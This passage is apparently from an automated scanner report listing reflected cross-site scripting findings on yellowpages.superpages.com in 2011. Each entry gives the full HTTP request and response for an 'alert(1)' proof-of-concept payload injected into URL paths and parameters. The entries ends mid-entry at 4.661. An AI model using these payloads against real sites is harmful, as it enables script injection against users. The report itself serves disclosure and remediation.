4.647. http://yellowpages.superpages.com/profiler/abook.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /profiler/abook.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88a3b"-alert(1)-"f68d6ca10b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /profiler88a3b"-alert(1)-"f68d6ca10b2/abook.jsp HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 404 /profiler88a3b&quot;-alert(1)-&quot;f68d6ca10b2/abook.jsp
Server: Unspecified
Set-Cookie: JSESSIONID=55AB36387FFC53A62D516A7528117702; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 17:11:42 GMT
Connection: close


                       <!--
       
       -->


                                   
...[SNIP]...
v = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/profiler88a3b"-alert(1)-"f68d6ca10b2/abook.jsp?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.648. http://yellowpages.superpages.com/profiler/abook.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /profiler/abook.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f26e"-alert(1)-"c50d8f06cd0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /profiler/abook.jsp8f26e"-alert(1)-"c50d8f06cd0 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 404 /profiler/abook.jsp8f26e&quot;-alert(1)-&quot;c50d8f06cd0
Server: Unspecified
Set-Cookie: JSESSIONID=3509911F0F012E3B5DB1A7C0CB989815; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 17:11:53 GMT
Connection: close


                       <!--
       
       -->


                                   
...[SNIP]...
//yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/profiler/abook.jsp8f26e"-alert(1)-"c50d8f06cd0?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.649. http://yellowpages.superpages.com/profiler/abook.jsp [couponsLoc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /profiler/abook.jsp

Issue detail

The value of the couponsLoc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64010"-alert(1)-"1a4a0871ee5 was submitted in the couponsLoc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /profiler/abook.jsp?requestAction=toCoupons&couponsLoc=64010"-alert(1)-"1a4a0871ee5 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Pragma: public
Cache-Control: max-age=0
Set-Cookie: JSESSIONID=53B85B4145F5F86D79C967AF60B8C824; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 64285
Date: Thu, 03 Feb 2011 17:11:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
m';
var hostServ = 'http://yellowpages.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/profiler/abook.jsp?requestAction=toCoupons&couponsLoc=64010"-alert(1)-"1a4a0871ee5";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

4.650. http://yellowpages.superpages.com/profiler/abook.jsp [requestAction parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /profiler/abook.jsp

Issue detail

The value of the requestAction request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b54c7"-alert(1)-"f103ef4cee was submitted in the requestAction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /profiler/abook.jsp?requestAction=toCouponsb54c7"-alert(1)-"f103ef4cee HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Pragma: public
Cache-Control: max-age=0
Set-Cookie: JSESSIONID=B8EF79737E86E1212341473A6B416604; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 64190
Date: Thu, 03 Feb 2011 17:10:34 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
Superpagescom';
var hostServ = 'http://yellowpages.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/profiler/abook.jsp?requestAction=toCouponsb54c7"-alert(1)-"f103ef4cee";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

4.651. http://yellowpages.superpages.com/reviews/js/ajaxreviews.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /reviews/js/ajaxreviews.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload daf46"-alert(1)-"5c6fb56425b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviewsdaf46"-alert(1)-"5c6fb56425b/js/ajaxreviews.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /reviewsdaf46&quot;-alert(1)-&quot;5c6fb56425b/js/ajaxreviews.js
Server: Unspecified
Set-Cookie: JSESSIONID=8C8FB1AE6353FA670702AEA79FA748ED; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:45 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
rv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/reviewsdaf46"-alert(1)-"5c6fb56425b/js/ajaxreviews.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.652. http://yellowpages.superpages.com/reviews/js/ajaxreviews.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /reviews/js/ajaxreviews.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbcb3"-alert(1)-"62acf7edf87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/jsdbcb3"-alert(1)-"62acf7edf87/ajaxreviews.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /reviews/jsdbcb3&quot;-alert(1)-&quot;62acf7edf87/ajaxreviews.js
Server: Unspecified
Set-Cookie: JSESSIONID=F0D826CA6507947C1A8E9F5CFFA2E340; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:54 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/reviews/jsdbcb3"-alert(1)-"62acf7edf87/ajaxreviews.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.653. http://yellowpages.superpages.com/reviews/js/ajaxreviews.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /reviews/js/ajaxreviews.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16b42"-alert(1)-"90ac00c6709 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/js/ajaxreviews.js16b42"-alert(1)-"90ac00c6709 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /reviews/js/ajaxreviews.js16b42&quot;-alert(1)-&quot;90ac00c6709
Server: Unspecified
Set-Cookie: JSESSIONID=0F2C1426EA2D2BBFB71984CD0E56C453; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:35:03 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
wpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/reviews/js/ajaxreviews.js16b42"-alert(1)-"90ac00c6709?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.654. http://yellowpages.superpages.com/reviews/js/logclick.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /reviews/js/logclick.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 379de"-alert(1)-"93123347901 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews379de"-alert(1)-"93123347901/js/logclick.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /reviews379de&quot;-alert(1)-&quot;93123347901/js/logclick.js
Server: Unspecified
Set-Cookie: JSESSIONID=4C4F8506785984A473A9B8524947C7EA; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:51 GMT
Cache-Control: private
Content-Length: 36083


                       <!--
       
       -->


                                   
...[SNIP]...
rv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/reviews379de"-alert(1)-"93123347901/js/logclick.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.655. http://yellowpages.superpages.com/reviews/js/logclick.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /reviews/js/logclick.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e628d"-alert(1)-"c967b65125d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/jse628d"-alert(1)-"c967b65125d/logclick.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /reviews/jse628d&quot;-alert(1)-&quot;c967b65125d/logclick.js
Server: Unspecified
Set-Cookie: JSESSIONID=0AFB22647AF905FBE48BA572E2509F50; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:35:03 GMT
Cache-Control: private
Content-Length: 36083


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/reviews/jse628d"-alert(1)-"c967b65125d/logclick.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.656. http://yellowpages.superpages.com/reviews/js/logclick.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /reviews/js/logclick.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66a3d"-alert(1)-"07047fb75a4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/js/logclick.js66a3d"-alert(1)-"07047fb75a4 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /reviews/js/logclick.js66a3d&quot;-alert(1)-&quot;07047fb75a4
Server: Unspecified
Set-Cookie: JSESSIONID=1ACF9BB55F7200980D5EE25293B5CD5B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:35:15 GMT
Cache-Control: private
Content-Length: 36083


                       <!--
       
       -->


                                   
...[SNIP]...
llowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/reviews/js/logclick.js66a3d"-alert(1)-"07047fb75a4?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.657. http://yellowpages.superpages.com/se/compositepage.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /se/compositepage.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c297c"-alert(1)-"e7400485e53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sec297c"-alert(1)-"e7400485e53/compositepage.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /sec297c&quot;-alert(1)-&quot;e7400485e53/compositepage.css
Server: Unspecified
Set-Cookie: JSESSIONID=396D5ADBD4D3142B9A631194C0B5FB09; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:54 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
ostServ = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/sec297c"-alert(1)-"e7400485e53/compositepage.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.658. http://yellowpages.superpages.com/se/compositepage.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /se/compositepage.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b676"-alert(1)-"7c7f2a5b008 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /se/compositepage.css9b676"-alert(1)-"7c7f2a5b008 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /se/compositepage.css9b676&quot;-alert(1)-&quot;7c7f2a5b008
Server: Unspecified
Set-Cookie: JSESSIONID=EF454397094E37958A6FE11A378F5815; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:02 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/se/compositepage.css9b676"-alert(1)-"7c7f2a5b008?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.659. http://yellowpages.superpages.com/yp/js/addList.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /yp/js/addList.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93874"-alert(1)-"5a42a034316 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /yp93874"-alert(1)-"5a42a034316/js/addList.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /yp93874&quot;-alert(1)-&quot;5a42a034316/js/addList.js
Server: Unspecified
Set-Cookie: JSESSIONID=3158E03FC87257FBDA42942A3231293F; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:23 GMT
Cache-Control: private
Content-Length: 36071


                       <!--
       
       -->


                                   
...[SNIP]...
ostServ = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/yp93874"-alert(1)-"5a42a034316/js/addList.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.660. http://yellowpages.superpages.com/yp/js/addList.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /yp/js/addList.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1fb9"-alert(1)-"1f6ee091e6a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /yp/jsa1fb9"-alert(1)-"1f6ee091e6a/addList.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /yp/jsa1fb9&quot;-alert(1)-&quot;1f6ee091e6a/addList.js
Server: Unspecified
Set-Cookie: JSESSIONID=D78C585477C06ABDFE12EC5A0B25B438; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:40 GMT
Cache-Control: private
Content-Length: 36071


                       <!--
       
       -->


                                   
...[SNIP]...
Serv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/yp/jsa1fb9"-alert(1)-"1f6ee091e6a/addList.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.661. http://yellowpages.superpages.com/yp/js/addList.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /yp/js/addList.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3517"-alert(1)-"9ab61aa91ab was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /yp/js/addList.jse3517"-alert(1)-"9ab61aa91ab HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /yp/js/addList.jse3517&quot;-alert(1)-&quot;9ab61aa91ab
Server: Unspecified
Set-Cookie: JSESSIONID=672734BFB58DFD80247BC648ECB604A3; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:48 GMT
Cache-Control: private
Content-Length: 36071


                       <!--
       
       -->


                                   
...[SNIP]...
p://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/yp/js/addList.jse3517"-alert(1)-"9ab61aa91ab?=";
var client_id = "133515049997773";


